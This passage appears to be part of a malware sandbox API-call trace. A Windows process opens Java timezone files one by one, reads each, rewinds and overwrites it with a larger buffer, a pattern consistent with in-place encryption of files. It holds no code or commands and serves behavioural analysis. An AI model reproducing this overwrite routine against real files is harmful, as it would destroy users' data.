lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0135.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Cambridge_Bay", cchWideChar=13, lpMultiByteStr=0x1f7362c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Cambridge_Bay", lpUsedDefaultChar=0x0) returned 13 [0135.968] ReadFile (in: hFile=0x1cc, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x434, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x359f2bc*=0x434, lpOverlapped=0x0) returned 1 [0136.045] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.046] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9bc, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x359f2d0*=0x9bc, lpOverlapped=0x0) returned 1 [0136.046] CloseHandle (hObject=0x1cc) returned 1 [0136.047] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Costa_Rica" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\costa_rica"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.047] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.048] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x89 [0136.048] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.048] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.048] ReleaseMutex (hMutex=0x168) returned 1 [0136.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Costa_Rica", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0136.048] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Costa_Rica", cchWideChar=10, lpMultiByteStr=0x1f7328c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Costa_Rica", lpUsedDefaultChar=0x0) returned 10 [0136.048] ReadFile (in: hFile=0x1cc, lpBuffer=0x2673508, nNumberOfBytesToRead=0x89, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2673508*, lpNumberOfBytesRead=0x359f2bc*=0x89, lpOverlapped=0x0) returned 1 [0136.050] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.050] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x611, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x611, lpOverlapped=0x0) returned 1 [0136.050] CloseHandle (hObject=0x1cc) returned 1 [0136.050] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Detroit" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\detroit"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.051] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.051] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4b0 [0136.051] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.052] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.052] ReleaseMutex (hMutex=0x168) returned 1 [0136.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Detroit", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0136.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Detroit", cchWideChar=7, lpMultiByteStr=0x1f7ace4, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Detroit", lpUsedDefaultChar=0x0) returned 7 [0136.052] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ea3978, nNumberOfBytesToRead=0x4b0, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea3978*, lpNumberOfBytesRead=0x359f2bc*=0x4b0, lpOverlapped=0x0) returned 1 [0136.088] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.088] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e953d8*, nNumberOfBytesToWrite=0xa38, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e953d8*, lpNumberOfBytesWritten=0x359f2d0*=0xa38, lpOverlapped=0x0) returned 1 [0136.088] CloseHandle (hObject=0x1cc) returned 1 [0136.088] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Goose_Bay" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\goose_bay"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.089] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.089] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x6c0 [0136.089] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.089] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.090] ReleaseMutex (hMutex=0x168) returned 1 [0136.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Goose_Bay", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.090] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Goose_Bay", cchWideChar=9, lpMultiByteStr=0x1f7362c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Goose_Bay", lpUsedDefaultChar=0x0) returned 9 [0136.090] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a48, nNumberOfBytesToRead=0x6c0, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesRead=0x359f2bc*=0x6c0, lpOverlapped=0x0) returned 1 [0136.103] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.103] WriteFile (in: hFile=0x1cc, lpBuffer=0x2668268*, nNumberOfBytesToWrite=0xc48, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2668268*, lpNumberOfBytesWritten=0x359f2d0*=0xc48, lpOverlapped=0x0) returned 1 [0136.103] CloseHandle (hObject=0x1cc) returned 1 [0136.104] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Havana" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\havana"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.104] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.104] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x53c [0136.105] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.105] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.105] ReleaseMutex (hMutex=0x168) returned 1 [0136.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Havana", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.105] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Havana", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Havana", lpUsedDefaultChar=0x0) returned 6 [0136.105] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x53c, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x359f2bc*=0x53c, lpOverlapped=0x0) returned 1 [0136.117] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.117] WriteFile (in: hFile=0x1cc, lpBuffer=0x1e943a8*, nNumberOfBytesToWrite=0xac4, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e943a8*, lpNumberOfBytesWritten=0x359f2d0*=0xac4, lpOverlapped=0x0) returned 1 [0136.117] CloseHandle (hObject=0x1cc) returned 1 [0136.117] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Indiana\\Vincennes" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\indiana\\vincennes"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.118] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.119] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x374 [0136.119] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.119] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.119] ReleaseMutex (hMutex=0x168) returned 1 [0136.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vincennes", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0136.119] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Vincennes", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Vincennes", lpUsedDefaultChar=0x0) returned 9 [0136.119] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f4a978, nNumberOfBytesToRead=0x374, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f4a978*, lpNumberOfBytesRead=0x359f2bc*=0x374, lpOverlapped=0x0) returned 1 [0136.175] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.175] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x8fc, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x359f2d0*=0x8fc, lpOverlapped=0x0) returned 1 [0136.175] CloseHandle (hObject=0x1cc) returned 1 [0136.176] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\La_Paz" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\la_paz"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.177] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.177] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x51 [0136.177] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.177] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.178] ReleaseMutex (hMutex=0x168) returned 1 [0136.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="La_Paz", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.178] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="La_Paz", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="La_Paz", lpUsedDefaultChar=0x0) returned 6 [0136.178] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f9fc48, nNumberOfBytesToRead=0x51, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f9fc48*, lpNumberOfBytesRead=0x359f2bc*=0x51, lpOverlapped=0x0) returned 1 [0136.179] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.179] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x5d9, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x359f2d0*=0x5d9, lpOverlapped=0x0) returned 1 [0136.180] CloseHandle (hObject=0x1cc) returned 1 [0136.180] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Mazatlan" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\mazatlan"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.181] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.181] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x348 [0136.181] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.182] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.182] ReleaseMutex (hMutex=0x168) returned 1 [0136.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mazatlan", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0136.182] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Mazatlan", cchWideChar=8, lpMultiByteStr=0x1f7360c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Mazatlan", lpUsedDefaultChar=0x0) returned 8 [0136.182] ReadFile (in: hFile=0x1cc, lpBuffer=0x1e967d8, nNumberOfBytesToRead=0x348, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e967d8*, lpNumberOfBytesRead=0x359f2bc*=0x348, lpOverlapped=0x0) returned 1 [0136.234] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.234] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x8d0, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x359f2d0*=0x8d0, lpOverlapped=0x0) returned 1 [0136.234] CloseHandle (hObject=0x1cc) returned 1 [0136.235] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Montevideo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\montevideo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.236] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.236] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x480 [0136.236] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.236] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.236] ReleaseMutex (hMutex=0x168) returned 1 [0136.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Montevideo", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0136.236] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Montevideo", cchWideChar=10, lpMultiByteStr=0x1f7342c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Montevideo", lpUsedDefaultChar=0x0) returned 10 [0136.236] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863f38, nNumberOfBytesToRead=0x480, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2863f38*, lpNumberOfBytesRead=0x359f2bc*=0x480, lpOverlapped=0x0) returned 1 [0136.271] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.271] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0xa08, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x359f2d0*=0xa08, lpOverlapped=0x0) returned 1 [0136.271] CloseHandle (hObject=0x1cc) returned 1 [0136.271] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\North_Dakota\\Beulah" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\north_dakota\\beulah"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.272] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.272] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x4fc [0136.272] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.272] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.273] ReleaseMutex (hMutex=0x168) returned 1 [0136.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Beulah", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0136.273] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Beulah", cchWideChar=6, lpMultiByteStr=0x1f7ace4, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Beulah", lpUsedDefaultChar=0x0) returned 6 [0136.273] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x4fc, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x359f2bc*=0x4fc, lpOverlapped=0x0) returned 1 [0136.291] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.291] WriteFile (in: hFile=0x1cc, lpBuffer=0x2693be8*, nNumberOfBytesToWrite=0xa84, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2693be8*, lpNumberOfBytesWritten=0x359f2d0*=0xa84, lpOverlapped=0x0) returned 1 [0136.291] CloseHandle (hObject=0x1cc) returned 1 [0136.291] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Port-au-Prince" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\port-au-prince"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.292] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.293] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x314 [0136.293] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.293] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.293] ReleaseMutex (hMutex=0x168) returned 1 [0136.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Port-au-Prince", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0136.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Port-au-Prince", cchWideChar=14, lpMultiByteStr=0x1f7366c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Port-au-Prince", lpUsedDefaultChar=0x0) returned 14 [0136.293] ReadFile (in: hFile=0x1cc, lpBuffer=0x28721a8, nNumberOfBytesToRead=0x314, lpNumberOfBytesRead=0x359f2bc, lpOverlapped=0x0 | out: lpBuffer=0x28721a8*, lpNumberOfBytesRead=0x359f2bc*=0x314, lpOverlapped=0x0) returned 1 [0136.327] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f300*=0) returned 0x0 [0136.327] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x89c, lpNumberOfBytesWritten=0x359f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x359f2d0*=0x89c, lpOverlapped=0x0) returned 1 [0136.327] CloseHandle (hObject=0x1cc) returned 1 [0136.327] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Resolute" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\resolute"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0136.328] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.329] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x41c [0136.329] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x359f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x359f8c0*=0) returned 0x0 [0136.329] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0136.329] ReleaseMutex (hMutex=0x168) returned 1 [0136.329] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Resolute", cchWideChar=8, lpMultiByteStr=0x0, 